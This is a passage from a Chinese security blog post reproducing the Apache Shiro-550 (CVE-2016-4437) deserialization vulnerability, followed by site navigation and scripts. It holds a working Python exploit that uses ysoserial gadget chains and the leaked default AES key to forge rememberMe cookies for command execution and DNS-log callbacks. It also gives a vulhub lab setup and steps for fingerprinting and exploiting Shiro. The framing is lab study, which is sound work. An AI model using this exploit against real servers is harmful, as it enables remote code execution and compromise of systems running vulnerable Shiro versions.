class="hljs-params">command</span>):</span><br>    <span class="hljs-comment"># 这里使用CommonsCollections2模块</span><br>    popen = subprocess.Popen([<span class="hljs-string">&#x27;java&#x27;</span>, <span class="hljs-string">&#x27;-jar&#x27;</span>, <span class="hljs-string">&#x27;ysoserial.jar&#x27;</span>, <span class="hljs-string">&#x27;CommonsCollections2&#x27;</span>, command], stdout=subprocess.PIPE)<br><br>    <span class="hljs-comment"># 明文需要按一定长度对齐，叫做块大小BlockSize 这个块大小是 block_size = 16 字节</span><br>    BS = AES.block_size<br><br>    <span class="hljs-comment"># 按照加密规则按一定长度对齐,如果不够要要做填充对齐</span><br>    pad = <span class="hljs-keyword">lambda</span> s: s + ((BS - <span class="hljs-built_in">len</span>(s) % BS) * <span class="hljs-built_in">chr</span>(BS - <span class="hljs-built_in">len</span>(s) % BS)).encode()<br><br>    <span class="hljs-comment"># 泄露的key</span><br>    key = <span class="hljs-string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span><br><br>    <span class="hljs-comment"># AES的CBC加密模式</span><br>    mode = AES.MODE_CBC<br><br>    <span class="hljs-comment"># 使用uuid4基于随机数模块生成16字节的 iv向量</span><br>    iv = uuid.uuid4().<span class="hljs-built_in">bytes</span><br><br>    <span class="hljs-comment"># 实例化一个加密方式为上述的对象</span><br>    encryptor = AES.new(base64.b64decode(key), mode, iv)<br><br>    <span class="hljs-comment"># 用pad函数去处理yso的命令输出，生成的序列化数据</span><br>    file_body = pad(popen.stdout.read())<br><br>    <span class="hljs-comment"># iv 与 （序列化的AES加密后的数据）拼接， 最终输出生成rememberMe参数</span><br>    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))<br><br>    <span class="hljs-keyword">return</span> base64_rememberMe_value<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dnslog</span>(<span class="hljs-params">command</span>):</span><br>    popen = subprocess.Popen([<span class="hljs-string">&#x27;java&#x27;</span>, <span class="hljs-string">&#x27;-jar&#x27;</span>, <span class="hljs-string">&#x27;ysoserial.jar&#x27;</span>, <span class="hljs-string">&#x27;URLDNS&#x27;</span>, command], stdout=subprocess.PIPE)<br>    BS = AES.block_size<br>    pad = <span class="hljs-keyword">lambda</span> s: s + ((BS - <span class="hljs-built_in">len</span>(s) % BS) * <span class="hljs-built_in">chr</span>(BS - <span class="hljs-built_in">len</span>(s) % BS)).encode()<br>    key = <span class="hljs-string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span><br>    mode = AES.MODE_CBC<br>    iv = uuid.uuid4().<span class="hljs-built_in">bytes</span><br>    encryptor = AES.new(base64.b64decode(key), mode, iv)<br>    file_body = pad(popen.stdout.read())<br>    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))<br>    <span class="hljs-keyword">return</span> base64_rememberMe_value<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    <span class="hljs-comment"># cc2的exp</span><br>    payload = encode_rememberme(<span class="hljs-string">&#x27;C:\\WINDOWS\\System32\\calc.exe&#x27;</span>)<br>    print(<span class="hljs-string">&quot;rememberMe=&#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(payload.decode()))<br><br>    <span class="hljs-comment"># dnslog的poc</span><br>    payload1 = encode_rememberme(<span class="hljs-string">&#x27;https://glacierrrr.online&#x27;</span>)<br>    print(<span class="hljs-string">&quot;rememberMe=&#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(payload1.decode()))<br><br>    cookie = &#123;<br>        <span class="hljs-string">&quot;rememberMe&quot;</span>: payload.decode()<br>    &#125;<br><br>    requests.get(url=<span class="hljs-string">&quot;http://127.0.0.1:8080/web_war/&quot;</span>, cookies=cookie)<br></code></pre></td></tr></table></figure>

<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>这里可以直接用vulhub更快的搭建</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">cd /vulhub/shiro/CVE-2016-4437<br>docker-compose build <br>docker-compose up -d<br></code></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2023/01/04/CuxULEhsrSj5wIa.png" srcset="/img/loading.gif" lazyload><br>搭建好后，8080端口就可以看到shiro框架的登录界面了</p>
<h2 id="判断shiro"><a href="#判断shiro" class="headerlink" title="判断shiro"></a>判断shiro</h2><p>我们先用burp suite抓个包看一下<br><img src="https://s2.loli.net/2023/01/04/ANtBJlzRTguFnOp.png" srcset="/img/loading.gif" lazyload><br>接着我们在报文头中加入<code>Cookie: rememberMe=123;</code><br><img src="https://s2.loli.net/2023/01/04/DgABhVidkIZUe8p.png" srcset="/img/loading.gif" lazyload><br>再返回的报文中，也可以清楚的看到<code>rememberMe=deleteMe</code><br>这个就是判断shiro框架的信息<br>或者使用bp的插件BurpShiroPassiveScan<br><img src="https://s2.loli.net/2023/01/04/yzoGSnuJLr2EWXc.png" srcset="/img/loading.gif" lazyload><br>这样bp会自动检测，并直接爆出shiro的漏洞</p>
<h2 id="利用shiro"><a href="#利用shiro" class="headerlink" title="利用shiro"></a>利用shiro</h2><p>可以使用我们上面给出的exp，利用ysoserial直接打</p>
<p>或者直接使用集成化较高的工具，扫描并利用<br><img src="https://s2.loli.net/2023/01/04/EsX8jOvBxM3Qgad.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-chain-item">漏洞复现</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E/">#框架漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Shiro-550反序列化漏洞复现</div>
      <div>https://glacierrrr.online/2023/01/04/Shiro-550反序列化漏洞复现/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Glacier</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年1月4日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/12/31/%E6%B8%97%E9%80%8F%E6%97%A5%E8%AE%B01/" title="渗透日记1">
                        <span class="hidden-mobile">渗透日记1</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
